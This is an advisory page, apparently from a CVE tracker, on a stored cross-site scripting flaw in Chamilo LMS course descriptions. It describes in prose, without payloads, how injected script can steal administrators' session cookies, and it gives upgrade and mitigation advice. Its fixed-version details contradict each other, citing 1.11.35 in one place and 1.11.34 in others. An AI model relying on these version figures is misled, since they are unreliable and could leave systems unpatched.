Platform
php
Component
chamilo-lms
Fixed in
1.11.35
CVE-2025-59543 describes a stored cross-site scripting (XSS) vulnerability affecting Chamilo Learning Management System (LMS) versions prior to 1.11.34. This vulnerability allows an attacker to inject malicious JavaScript code into course descriptions, potentially leading to account takeover. The vulnerability has been addressed in version 1.11.34, and users are strongly advised to upgrade.
The impact of CVE-2025-59543 is significant due to the potential for account takeover. An attacker with a low-privileged account, such as a trainer, can inject malicious JavaScript into the course description field. When other users, including administrators, view the course information page, the injected script executes in their browser context. This allows the attacker to steal sensitive session cookies or tokens, effectively gaining control of the administrator's account. This could lead to unauthorized access to sensitive data, modification of course content, or even complete compromise of the LMS system. The attack pattern resembles other XSS vulnerabilities where malicious scripts are injected into user-controllable fields to gain unauthorized access.
CVE-2025-59543 was publicly disclosed on 2026-03-06. There is no indication of active exploitation campaigns at this time, but the vulnerability's criticality warrants immediate attention. No public proof-of-concept (POC) code has been released, but the XSS nature of the vulnerability makes it likely that one will emerge. The vulnerability has not been added to the CISA KEV catalog.
Exploit Status
EPSS
0.04% (13% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-59543 is to upgrade Chamilo LMS to version 1.11.34 or later. If an immediate upgrade is not possible, consider implementing temporary workarounds. Input validation and sanitization on the course description field can help prevent malicious JavaScript from being injected. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide an additional layer of protection. Regularly review course content for suspicious scripts and consider restricting user roles to limit the ability to modify course descriptions.
Update Chamilo LMS to version 1.11.34 or higher. This version fixes the stored XSS vulnerability in the course description, preventing potential account takeover.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-59543 is a critical stored cross-site scripting (XSS) vulnerability in Chamilo LMS versions prior to 1.11.34, allowing attackers to inject malicious JavaScript.
You are affected if you are using Chamilo LMS version 1.11.34 or earlier. Upgrade to 1.11.34 to resolve the vulnerability.
Upgrade Chamilo LMS to version 1.11.34. Consider input validation and WAF rules as temporary mitigations.
There is no current evidence of active exploitation, but the vulnerability's criticality warrants immediate action.
Refer to the official Chamilo security advisory for detailed information and updates: [https://www.chamilo.org/en/security-advisories](https://www.chamilo.org/en/security-advisories)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.